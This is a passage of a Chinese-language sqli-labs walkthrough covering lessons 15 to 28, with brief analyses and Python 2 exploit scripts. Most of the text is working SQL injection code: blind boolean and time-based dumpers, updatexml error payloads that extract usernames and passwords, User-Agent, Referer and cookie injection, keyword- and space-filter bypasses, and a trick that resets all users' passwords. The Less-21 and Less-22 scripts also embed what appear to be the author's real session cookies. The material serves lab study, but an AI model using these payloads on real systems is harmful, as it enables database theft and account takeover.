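        payload = {'uname': "' or %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        if 'flag.jpg' in r.text:
            print '  [-]The Datas num is', i
            return i
        i+=1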

def GuessDataLen(dname, tname, cname, n):
    """Length of the value in row n (0-based LIMIT offset) of column cname.

    Scans positions until the ``ascii(SUBSTR())`` probe stops showing
    ``flag.jpg``; returns pos-1.
    """
    print '    [-]Guessing data length'
    pos = 1
    while True:
        cond = "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" % (cname, dname, tname, n, pos)
        page = post("http://localhost/sqllab/Less-15/", data={'uname': cond, 'passwd': ''}).text
        if 'flag.jpg' not in page:
            print '  [-]The Data Lenth is', pos - 1
            return pos - 1
        pos += 1

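def GuessDatas(dname, tname, cname):
    """Dump every value of column cname in dname.tname, one character per
    probe, using the ``flag.jpg`` marker as the signal. Returns the values.
    """
    from time import sleep
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-15/",data=payload)
                        break
                    except Exception:
                        # retry only real errors: the original bare except also
                        # swallowed KeyboardInterrupt, so Ctrl-C could not stop
                        # this loop; pause instead of hammering a dead server
                        print 'Relaxing...'
                        sleep(1)
                if 'flag.jpg' in r.text:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data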


# Driver: schema -> tables -> columns -> rows, all through the boolean
# (flag.jpg) channel above. Module-level, so it also runs on import.
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)  # also dumps every column's rows via GuessDatas
print '[!]All Done!'

Day16-Less16

分析

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

1") or 1#

1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=8#
1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),1,1))=115#

代码

from requests import post
from time import *

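def GuessDBLength():
    """Time-based blind probe for length(database()) on Less-16 (POST, ``")``
    context). ``or 1`` makes the first branch true; the UNION's second row
    carries sleep(2) only when the WHERE condition holds, so a response
    slower than 1.5 s is the hit. Returns the matching length.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        # wall clock: time.clock() is CPU time on Unix (and removed in 3.8), so
        # the 2 s the server spends in sleep() would never show up in it
        s = time()
        payload = {'uname': '1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=%d#' %i, 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1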

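def GuessDBName(length):
    """Recover the database name one character at a time (time-based).

    For positions 1..length, tries ASCII 0..126 and keeps the first code whose
    request is delayed. A position with no hit is skipped silently.
    Returns the name.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
            payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            post("http://localhost/sqllab/Less-16/",data=payload)
            if time()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name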

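def GuessTBsNum(name):
    """Count the tables of schema ``name`` (time-based).

    Tries i = 0, 1, ...; the first delayed probe is the count. ``name`` goes
    into a quoted SQL literal unescaped.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s > 1.5:
            print '  [-]The Tables num is', i
            return i
        i+=1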

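def GuessTBNameLenth(n, name):
    """Length of the n-th table name (0-based LIMIT offset) in schema ``name``.

    ``ascii(SUBSTR(..., i, 1))`` is truthy while a character exists; the first
    position that is NOT delayed lies one past the end, so i-1 is returned.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1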

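def GuessTBsNames(num, DBName):
    """Recover all ``num`` table names of schema ``DBName`` (time-based).

    Length from GuessTBNameLenth, then each character by scanning ASCII
    0..126 for the delayed probe. Returns the names in LIMIT-offset order.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}
                post("http://localhost/sqllab/Less-16/",data=payload)
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames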

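def GuessCLMNum(tname,dname):
    """Count the columns of dname.tname via INFORMATION_SCHEMA (time-based).

    Tries i = 0, 1, ...; the first delayed probe is the count.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1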

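def GuessCLMLen(cnum, tname, dname):
    """Length of the cnum-th column name (0-based LIMIT offset) of dname.tname.

    First position whose ``ascii(SUBSTR())`` probe is not delayed is one past
    the end; returns i-1.
    """
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1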

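def GuessCLMName(DBName, TNames):
    """For each table in TNames, recover its column names (time-based) and
    dump every column's rows via GuessDatas. Prints only; returns nothing.

    A column position with no hit in ASCII 0..126 is skipped.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
                    payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}
                    post("http://localhost/sqllab/Less-16/",data=payload)
                    if time()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break
            # GuessDatas prints the rows itself; its return value is unused here
            GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames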


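def GuessDatasnum(dname, tname, cname):
    """Row count of dname.tname through ``count(cname)`` (time-based).

    Posts to the same Less-16/ URL as every sibling (the original appended a
    stray ``?id=``). count(col) skips NULLs while GuessDatas walks rows by
    LIMIT offset, so a NULL cell makes the two disagree. Returns the first
    delayed i.
    """
    i = 0
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1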

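def GuessDataLen(dname, tname, cname, n):
    """Length of the value in row n (0-based LIMIT offset) of column cname.

    Scans positions until ``ascii(SUBSTR())`` stops delaying; returns i-1.
    """
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = time()  # wall clock; clock() is CPU time on Unix and misses the socket wait
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}
        post("http://localhost/sqllab/Less-16/",data=payload)
        if time()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1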

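def GuessDatas(dname, tname, cname):
    """Dump every value of column cname in dname.tname, one character per
    probe, using the sleep(2) delay as the signal. Returns the values.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    # wall clock (clock() is CPU time on Unix); taken inside the
                    # retry loop so a failed attempt does not inflate the timing
                    s = time()
                    try:
                        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        post("http://localhost/sqllab/Less-16/",data=payload)
                        break
                    except Exception:
                        # retry only real errors: the original bare except also
                        # swallowed KeyboardInterrupt, so Ctrl-C could not stop
                        # this loop; pause instead of hammering a dead server
                        print 'Relaxing...'
                        sleep(1)
                if time()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data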

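# Driver: schema -> tables -> columns -> rows. The timer uses time() rather
# than clock(): on Unix clock() is CPU time, so a run that is almost entirely
# socket waiting would report ~0 s (and clock() is gone in Python 3.8+).
s = time()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)  # also dumps every column's rows via GuessDatas
print '[!]All Done!'
print '[!]Timer', round(time()-s,2),'s'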

Day17-Less17

分析

UPDATE table SET password = '' WHERE username = 'Dhakkan'

基于报错注入:
UPDATE users SET password = ''+(select updatexml(1,concat('*',(select * from (select username from security.users limit 0,1)x),'*',(select * from (select password from security.users limit 0,1)x)),1))+'' WHERE username = 'Dhakkan';


(通过子查询(派生表)把 select 出来的结果再包一层、换一个名字,绕过 MySQL 不允许在同一条语句里先 select 再 update 同一张表的限制)
UPDATE users SET password = ''+(select 1 from (select 1) as a where updatexml(1,concat('*',(select username from security.users as x limit 0,1)),1))+'' WHERE username = 'Dhakkan';
上面这种只给 users 起别名(as x)而不包一层派生表的写法仍然会报错:
即"ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause"


盲注也行:
基于时间
select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c);
select(select if(length(database())=8,sleep(1),'1') From ((select 1 as a) union (select 2 as b)) as c);

或者基于正则报错:条件为真时用 '.*'(合法正则)正常匹配,为假时用 '*'(非法正则)让 MySQL 报错,以此区分真假

select(select 'a' REGEXP (case when length(database())=8 then '.*' else '*' end) From ((select 1 as a) union (select 2 as b)) as c);

即
UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';
或者
UPDATE users SET password = ''+(select(select 'a' REGEXP (case when length(database())=8 then '.*' else '*' end) From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';

UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From (select 1,2)))+'' WHERE username = 'Dhakkan';

from requests import *
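# Less-17: the password field lands inside
#   UPDATE ... SET password = '<passwd>' WHERE username = 'Dhakkan'
# Time-based probe: the subquery sleeps 1 s only when length(database())=8.
# The original only printed the page, but the delay IS the signal, so the
# round-trip time is printed as well. Note the UPDATE really runs: whatever
# the expression evaluates to overwrites Dhakkan's stored password (lab only).
pdata = {
'uname': "Dhakkan",
'passwd':"'+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'"
}
r = post('http://localhost/sqllab/Less-17/', data = pdata)
print r.text
print '[!]elapsed', round(r.elapsed.total_seconds(), 2), 's'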

Day18-Less18

分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','','')

x'
::1', 'Dhakkan')
('x'','   ::1','')

x' or 1
', '::1', 'Dhakkan')
('x' or 1    ','','')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("useragent","ip","username") VALUES('','::1','Dhakkan');
->
INSERT INTO("useragent","ip","username") VALUES('')#','::1','Dhakkan');

('') or 1#','','')
or 1#', '::1', 'Dhakkan')
INSERT INTO("useragent","ip","username") VALUES('') or 1#','::1','Dhakkan');


INSERT INTO("useragent","ip","username") VALUES('
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '
','::1','Dhakkan');


User-Agent 注入:
时间
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

# Less-18: the User-Agent header is written into a log table after a valid
# login (see the INSERT sketch above), so real credentials (Dhakkan / dumbo)
# are posted. The header closes the quoted value and triggers an updatexml()
# error whose message carries the first users row (username*password).
ua_payload = ("1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),"
              "'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '")
pdata = {'uname': 'Dhakkan', 'passwd': 'dumbo'}
headers = {'User-Agent': ua_payload}

print post('http://localhost/sqllab/Less-18/', headers = headers, data = pdata).text

Day19-Less19

分析

想做出这题,先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','')

x'
::1')
('x'','   ::1')

x' or 1
', '::1')
('x' or 1    ','::1')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句,前面的字段与后面值的数目不一致)
INSERT INTO("referer","ip") VALUES('','::1');
->
INSERT INTO("referer","ip") VALUES('')#','::1');

('') or 1#','','')
or 1#', '::1')
INSERT INTO("referer","ip") VALUES('') or 1#','::1');


INSERT INTO("referer","ip") VALUES('
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '
','::1');


Referer 注入:
时间
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

# Less-19: same as Less-18 but the Referer header is the logged value, so the
# payload goes there; a valid login (Dhakkan / dumbo) is still required. The
# updatexml() error message returns the first users row.
ref_payload = ("1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),"
               "'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '")
pdata = {'uname': 'Dhakkan', 'passwd': 'dumbo'}
headers = {'referer': ref_payload}

print post('http://localhost/sqllab/Less-19/', headers = headers, data = pdata).text

Day20-Less20

分析

select XX,XX from XXXX where username='$cookie' LIMIT 0,1
dhakkan'
'dhakkan'' LIMIT 0,1

select XX,XX from XXXX where username='
' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#
' LIMIT 0,1

比较简单

代码

from requests import *

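# Less-20: the uname cookie is placed unescaped into
#   select ... where username='$cookie' LIMIT 0,1
# so a plain GET with a crafted cookie is enough; nothing is posted (the
# original also built an unused uname/passwd dict). The updatexml() error
# message carries the first users row back.
# Only the uname cookie is sent. The original pasted the author's own browser
# cookies into the header as well (analytics IDs and what looks like a local
# Jupyter session cookie) -- a credential leak in a published script, and
# noise the target never needs.
u = "uname=' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#"
headers = {
'cookie': u
}

print get('http://localhost/sqllab/Less-20/', headers = headers).text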

Day21-Less21

分析

b64encode("
troy'
")
->
'troy'') LIMIT 0,1

troy')

') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#

代码

from requests import *
from base64 import *

# sqli-labs Less-21: same cookie injection as Less-20, but the lab base64-decodes
# the `uname` cookie first, so the payload is b64encode()'d before being sent.
# NOTE(review): pdata is unused here, the request is a GET with headers only.
pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

# `')` closes the parenthesised, single-quoted value shown in the analysis
# above; `#` drops the rest of the lab's query.
u = b64encode("') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
# NOTE(review): the cookies after uname are the author's own browser cookies and
# are irrelevant to the lab; a published script should not carry session tokens.
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

# Python 2 print statement; prints the raw response body.
print get('http://localhost/sqllab/Less-21/', headers = headers).text

Day22-Less22

分析

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
和 21 一样,只不过单引号改双引号

代码

from requests import *
from base64 import *

# sqli-labs Less-22: identical to the Less-21 script except that the cookie
# value is double-quoted on the server side, so the payload opens with `"`.
# NOTE(review): pdata is unused here, the request is a GET with headers only.
pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
# NOTE(review): the cookies after uname are the author's own browser cookies and
# are irrelevant to the lab; a published script should not carry session tokens.
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

# Python 2 print statement; prints the raw response body.
print get('http://localhost/sqllab/Less-22/', headers = headers).text

Day23-Less23

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'-- -
->
' LIMIT 0,1
select *,* from XX where id = '1'-- -' LIMIT 0,1

''
->
ok
select *,* from XX where id = '''' LIMIT 0,1

1''
->
ok

1#
->
ok

'1' and 0--+
->
1' and 0 ' LIMIT 0,1
select *,* from XX where id = '    '1' and 0--+' LIMIT 0,1

过滤注释,bypass:
select *,* from XX where id = '
' or 1 union select 1,2,'3
' LIMIT 0,1

1' union 1,2,3||'1
select *,* from XX where id = '
1' union 1,2,3||'1
' LIMIT 0,1

利用:
报错:
1' union select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)),2,3||'1

时间:
' or 1 union select (select sleep(1) from (select 1,2)x where length(database())=7),2,'3

代码

from requests import *
import re

# Brute-forces which percent-encoded byte the lab still accepts as whitespace:
# every space in the probe is replaced by %XX for XX = 0..255 and the response
# is checked for the 'Dumb' row.
# NOTE(review): this block sits under Day23 but requests Less-26 (the same
# block is repeated verbatim under Day27); the `oorr` spelling is the Less-26
# keyword-filter bypass, not something Less-23 needs.
for i in range(256):
    row = "0' oorr 1 oorr '"
    # BUG: '%%%x' yields '%a' for i < 16 instead of '%0a', so the first 16
    # candidates are malformed escapes; '%%%02x' would be the intended form.
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    # Python 2 print statement. findall(...)[0] raises IndexError and aborts
    # the whole loop on any response that lacks the 'result:' marker.
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html


Day24-Less24

分析

UPDATE table SET password = '' WHERE username = '' and password = ''
INSERT INTO("username","password") VALUES('2','1');

1') or 1#
1" or 1#

1")#
INSERT INTO("username","password") VALUES('','1');


select (updatexml(1,concat('*',(select username from security.users limit 0,1)),1)) from (select 1,2)x
注册一个用户:
' or 1 or '
密码为 hack
然后修改密码为 hackme,提交后数据库全部的用户密码都为 hackme
UPDATE table SET password = 'hackme' WHERE username = '
' or 1 or '
'  and password = ''
比较奇怪的地方是,这样修改的时候,后台貌似能检测到,看了一下源码,有以下判断:
$row = mysql_affected_rows();
if($row==1)
那就能解释这个问题了
但是,即使返回了错误页面,UPDATE 实际上也已经执行了:mysql_affected_rows() 的判断发生在语句执行之后,只能事后发现,无法阻止。


假如你知道管理员的账号,那么你可以注册一个
admin'#,密码为 troy
然后登陆修改密码
UPDATE table SET password = 'troy' WHERE username = 'admin'#' and password = 'troy'
实现重置管理员密码

用户名密码字段长度限制,没法再深入
' or 1 or '就占用 11 个字符了,只剩 9 个字符可用,database()都有 10 个字符

Day25-Less25

分析



0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)--+
password 中的 or 被过滤成 passwd,报错
Unknown column 'passwd' in 'field list'
改成下面就 ok 了

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

还可以:
0' oorr (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

利用的话
0' union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users--+

Day26-Less25a

分析

数字型
盲注
基于错误:
0 oorr length(database())=7

时间:
1 aandnd (select sleep(1) from (select 1,2,3 )x where length(database())=8)

其他利用
0 union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users

Day27-Less26

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'
->
'1'' LIMIT 0,1
select *,* from XX where id = '1'' LIMIT 0,1

'1'
->
1'' LIMIT 0,1
select *,* from XX where id = ''1'' LIMIT 0,1


select *,* from XX where id = '0' or 1 or '' LIMIT 0,1

基于报错:
0%27%a0oorr%a0length(database())=8%a0oorr%a0%27
1%27%a0aandnd%a0(select%a0(updatexml(1,concat(%27|%27,(select%a0username%a0from%a0security.users%a0limit%a00,1),%27<>%27,(select%a0passwoorrd%a0from%a0security.users%a0limit%a00,1)),1))%a0from%a0(select%a01,2)x)%a0oorr%a0%27

或者
0'%a0union%a0select%a01,2,group_concat(username,'<>',passwoorrd,'<br>')%a0from%a0users%a0where%a0'1


select *,* from XX where id = '0' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '' LIMIT 0,1


代码

from requests import *
import re

# Less-26: the keyword filter strips 'or' (hence 'oorr', which collapses back
# to 'or') and spaces; this loop tries every %XX byte as a space substitute and
# reports the ones that still return the 'Dumb' row. Same block as under Day23.
for i in range(256):
    row = "0' oorr 1 oorr '"
    # BUG: '%%%x' gives '%a' rather than '%0a' for i < 16, so those candidates
    # are malformed percent-escapes; '%%%02x' is the intended format.
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    # Python 2 print statement; findall(...)[0] raises IndexError (and ends the
    # loop) when the response has no 'result:' marker.
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html

Day28-Less26a

分析

0%27%a0oorr%a01%a0oorr%a0%27

基于错误
0%27%a0oorr%a0length(database())=7%a0oorr%a0%27

这个没报错
1')%a0union%a0select%a01,2,3%a0from%a0users%a0where%a0('1
即
1') union select 1,2,3 from users where ('1

所以可以利用如下
0%27)%a0union%a0select%a01,2,group_concat(username,%27*%27,passwoorrd,%27%3Cbr%3E%27)%a0from%a0users%a0where%a0(%271
即
0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1


应该有个判断,如果有错误也不抛异常
比如下面这句是 gg 的
1')  and  (select  (updatexml(1,concat('|',(select   username   from   security.users   limit   0,1),'',(select   password   from   security.users   limit   0,1)),1))  from  (select   1,2)x)  or  ('0

代码

from requests import *
import re

#for i in range(256):
    #row = "0' oorr 1 oorr '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-26a/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


# Less-26a: `')` variant of Less-26. The payload is written plainly and the two
# replace() calls apply the filter bypass to the whole string: spaces become
# %a0 and every 'or' becomes 'oorr' -- which also rewrites 'password' into
# 'passwoorrd', the form the filter collapses back (see the analysis above).
row = "0') or (select (updatexml(1,concat('|',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or ('"
row = row.replace(' ','%a0').replace('or','oorr')

html = get("http://localhost/sqllab/Less-26a/?id="+row).text
# Python 2 print statements. The 'XPATH' check tests whether the updatexml()
# error text made it into the page; per the note above, this lesson appears to
# suppress DB errors, so the expected output is False.
print html
print 'XPATH' in html
print row

Day29-Less27

分析


只过滤了空格以及 union、select, sql 大小写不敏感,随便大写一下就过了,空格用 %a0
或者多嵌套几层
0\" uunionnion seseleselectctlect 1,2,group_concat(username,'<>',password,'<br>') from users where \"1
select 貌似过滤了几次,要多嵌套几层

EXEC('se'+'lect'+'* from users;' )


很简单:
0' or (selecT (updatexml(1,concat('|',(selecT username from security.users limit 0,1),'<>',(selecT password from security.users limit 0,1)),1)) from (selecT 1,2)x) or '

当然也有:
0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1

和前几题一样的

代码

from requests import *
import re

#for i in range(256):
    #row = "0' or 1 or '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-27/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


# Less-27: the lab filters the lowercase keywords union/select and spaces;
# mixed case (unioN, selecT) passes the keyword filter and %a0 stands in for
# each space. The union pulls username/password pairs into the displayed row.
row = "0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27/?id="+row).text
# Python 2 print statements. NOTE(review): `'XPATH' in html` is a leftover from
# the error-based scripts; this payload is union-based, so a row marker such as
# 'Dumb' (used by the later lessons) is the meaningful success check.
print html
print 'XPATH' in html
print row

Day30-Less27a

分析

对比 27,只是单引号改为双引号,而且不显示具体错误,其他一样的
既然屏蔽错误显示,报错注入当然也就不能用了

代码

from requests import *
import re

# Less-27a: same as the Less-27 script with the value double-quoted; DB errors
# are not displayed in this lesson, so only the union/row-marker route applies.
row = "0\" unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where \"1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27a/?id="+row).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html
print row

Day31-Less28

分析

加了圆括号,其他没变
0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1

代码

from requests import *
import re

# Less-28: `')` variant; per the analysis above only the parentheses changed,
# and lowercase union/select are used here unchanged.
row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28/?id="+row).text
# Python 2 print statements; 'Dumb' in html reports whether a user row came back.
print html
print 'Dumb' in html
print row

Day32-Less28a

分析

连空格都没过滤,,,,emmmmm  比起前几题很简单了,随便过

代码

from requests import *
import re

# Less-28a: identical to the Less-28 script. The note above says this lesson
